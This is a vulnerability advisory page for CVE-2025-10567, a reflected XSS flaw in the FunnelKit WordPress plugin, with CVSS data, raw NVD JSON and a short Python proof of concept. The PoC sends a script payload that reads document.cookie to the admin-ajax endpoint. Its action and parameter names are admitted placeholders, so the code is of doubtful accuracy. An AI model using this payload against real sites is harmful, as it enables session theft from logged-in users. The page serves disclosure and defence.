Security Vulnerability Report
中文
CVE-2025-10567 CVSS 6.3 MEDIUM

CVE-2025-10567

Published: 2025-11-05 06:15:32
Last Modified: 2026-04-15 00:35:42

Description

The FunnelKit WordPress plugin before 3.12.0.1 does not sanitize user input before echoing it back in some of its checkout-related AJAX actions, allowing attackers to conduct reflected XSS attacks against logged-in users.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

FunnelKit WordPress Plugin < 3.12.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-10567 PoC - Reflected XSS in FunnelKit WordPress Plugin # Target: FunnelKit plugin < 3.12.0.1 target_url = "http://target-wordpress-site.com" # Malicious payload for reflected XSS xss_payload = "<script>alert(document.cookie)</script>" # FunnelKit AJAX endpoint - checkout related action ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Construct malicious request params = { "action": "funnelkit_checkout_action", # Example action name "param_name": xss_payload # Unsanitized parameter reflected in response } print(f"[*] Sending malicious request to {ajax_endpoint}") print(f"[*] Payload: {xss_payload}") try: response = requests.get(ajax_endpoint, params=params, timeout=10) # Check if payload is reflected in response if xss_payload in response.text: print("[+] VULNERABLE! XSS payload reflected in response") print("[+] Attack can be executed via social engineering") else: print("[-] Payload not reflected or patched") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10567", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:32.363", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FunnelKit WordPress plugin before 3.12.0.1 does not sanitize user input before echoing it back in some of its checkout-related AJAX actions, allowing attackers to conduct reflected XSS attacks against logged-in users."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/c7536b0c-3bce-449d-937e-b0195990110a/", "source": "[email protected]"}]}}